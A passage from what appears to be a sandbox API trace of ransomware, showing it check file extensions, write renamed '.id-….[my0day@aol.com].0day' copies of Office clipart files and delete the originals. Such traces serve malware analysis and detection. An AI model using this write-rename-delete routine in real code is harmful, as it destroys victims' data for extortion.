(lpString1=".dbf", lpString2=".wmv") returned -1 [0052.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0052.045] lstrlenW (lpString=".1cd") returned 4 [0052.045] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0052.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0052.045] lstrlenW (lpString=".jpg") returned 4 [0052.045] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.155] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.155] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.155] GetLastError () returned 0x0 [0052.155] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x2340, lpOverlapped=0x0) returned 1 [0052.157] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x2350, lpOverlapped=0x0) returned 1 [0052.158] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.158] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.158] SetEndOfFile (hFile=0x1a0) returned 1 [0052.158] CloseHandle (hObject=0x1a0) returned 1 [0052.158] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.158] SetEndOfFile (hFile=0x228) returned 1 [0052.159] CloseHandle (hObject=0x228) returned 1 [0052.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.159] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0052.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.159] lstrlenW (lpString=".doc") returned 4 [0052.159] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.160] lstrlenW (lpString=".docx") returned 5 [0052.160] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.160] lstrlenW (lpString=".pdf") returned 4 [0052.160] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.160] lstrlenW (lpString=".xls") returned 4 [0052.160] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.160] lstrlenW (lpString=".xlsx") returned 5 [0052.160] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.160] lstrlenW (lpString=".ppt") returned 4 [0052.160] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.160] lstrlenW (lpString=".zip") returned 4 [0052.160] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.160] lstrlenW (lpString=".rar") returned 4 [0052.160] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.160] lstrlenW (lpString=".bz2") returned 4 [0052.160] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.160] lstrlenW (lpString=".7z") returned 3 [0052.160] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.160] lstrlenW (lpString=".dbf") returned 4 [0052.160] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.160] lstrlenW (lpString=".1cd") returned 4 [0052.160] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.160] lstrlenW (lpString=".jpg") returned 4 [0052.160] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.161] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=3251) returned 1 [0052.161] CloseHandle (hObject=0x228) returned 1 [0052.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 0x20 [0052.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.161] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.161] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.162] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xcb3, lpOverlapped=0x0) returned 1 [0052.163] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0052.164] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.164] SetEndOfFile (hFile=0x1a0) returned 1 [0052.164] CloseHandle (hObject=0x1a0) returned 1 [0052.164] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.172] SetEndOfFile (hFile=0x228) returned 1 [0052.173] CloseHandle (hObject=0x228) returned 1 [0052.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.173] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0052.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0052.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0052.173] lstrlenW (lpString=".doc") returned 4 [0052.173] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.174] lstrlenW (lpString=".docx") returned 5 [0052.174] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.174] lstrlenW (lpString=".pdf") returned 4 [0052.174] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.174] lstrlenW (lpString=".xls") returned 4 [0052.174] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.174] lstrlenW (lpString=".xlsx") returned 5 [0052.174] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.174] lstrlenW (lpString=".ppt") returned 4 [0052.174] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0052.174] lstrlenW (lpString=".zip") returned 4 [0052.174] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.174] lstrlenW (lpString=".rar") returned 4 [0052.174] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.174] lstrlenW (lpString=".bz2") returned 4 [0052.174] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.174] lstrlenW (lpString=".7z") returned 3 [0052.174] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0052.174] lstrlenW (lpString=".dbf") returned 4 [0052.174] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0052.174] lstrlenW (lpString=".1cd") returned 4 [0052.174] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0052.174] lstrlenW (lpString=".jpg") returned 4 [0052.174] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.174] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=8097) returned 1 [0052.174] CloseHandle (hObject=0x228) returned 1 [0052.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 0x20 [0052.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.175] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.175] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.176] GetLastError () returned 0x0 [0052.176] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1fa1, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1fb0, lpOverlapped=0x0) returned 1 [0052.178] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.178] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.178] SetEndOfFile (hFile=0x1a0) returned 1 [0052.179] CloseHandle (hObject=0x1a0) returned 1 [0052.179] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.179] SetEndOfFile (hFile=0x228) returned 1 [0052.179] CloseHandle (hObject=0x228) returned 1 [0052.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.180] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0052.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0052.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0052.180] lstrlenW (lpString=".doc") returned 4 [0052.180] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.180] lstrlenW (lpString=".docx") returned 5 [0052.180] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.180] lstrlenW (lpString=".pdf") returned 4 [0052.180] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.180] lstrlenW (lpString=".xls") returned 4 [0052.180] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.180] lstrlenW (lpString=".xlsx") returned 5 [0052.180] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.180] lstrlenW (lpString=".ppt") returned 4 [0052.180] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0052.180] lstrlenW (lpString=".zip") returned 4 [0052.180] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.180] lstrlenW (lpString=".rar") returned 4 [0052.180] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.181] lstrlenW (lpString=".bz2") returned 4 [0052.181] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.181] lstrlenW (lpString=".7z") returned 3 [0052.181] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0052.181] lstrlenW (lpString=".dbf") returned 4 [0052.181] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0052.181] lstrlenW (lpString=".1cd") returned 4 [0052.181] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0052.181] lstrlenW (lpString=".jpg") returned 4 [0052.181] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.181] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=7686) returned 1 [0052.181] CloseHandle (hObject=0x228) returned 1 [0052.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 0x20 [0052.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.181] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.181] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.182] GetLastError () returned 0x0 [0052.182] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1e06, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1e10, lpOverlapped=0x0) returned 1 [0052.184] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.184] SetEndOfFile (hFile=0x1a0) returned 1 [0052.184] CloseHandle (hObject=0x1a0) returned 1 [0052.185] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.185] SetEndOfFile (hFile=0x228) returned 1 [0052.185] CloseHandle (hObject=0x228) returned 1 [0052.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.186] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0052.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0052.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0052.186] lstrlenW (lpString=".doc") returned 4 [0052.186] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.186] lstrlenW (lpString=".docx") returned 5 [0052.186] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.186] lstrlenW (lpString=".pdf") returned 4 [0052.186] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.186] lstrlenW (lpString=".xls") returned 4 [0052.186] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.186] lstrlenW (lpString=".xlsx") returned 5 [0052.186] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.186] lstrlenW (lpString=".ppt") returned 4 [0052.186] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0052.186] lstrlenW (lpString=".zip") returned 4 [0052.186] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.186] lstrlenW (lpString=".rar") returned 4 [0052.186] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.186] lstrlenW (lpString=".bz2") returned 4 [0052.186] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.186] lstrlenW (lpString=".7z") returned 3 [0052.186] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0052.186] lstrlenW (lpString=".dbf") returned 4 [0052.186] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0052.187] lstrlenW (lpString=".1cd") returned 4 [0052.187] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0052.187] lstrlenW (lpString=".jpg") returned 4 [0052.187] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.187] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=11891) returned 1 [0052.187] CloseHandle (hObject=0x228) returned 1 [0052.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 0x20 [0052.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.187] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.187] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.188] GetLastError () returned 0x0 [0052.188] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x2e73, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x2e80, lpOverlapped=0x0) returned 1 [0052.190] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.190] SetEndOfFile (hFile=0x1a0) returned 1 [0052.190] CloseHandle (hObject=0x1a0) returned 1 [0052.190] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.190] SetEndOfFile (hFile=0x228) returned 1 [0052.191] CloseHandle (hObject=0x228) returned 1 [0052.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0052.192] lstrlenW (lpString="C:\\Program 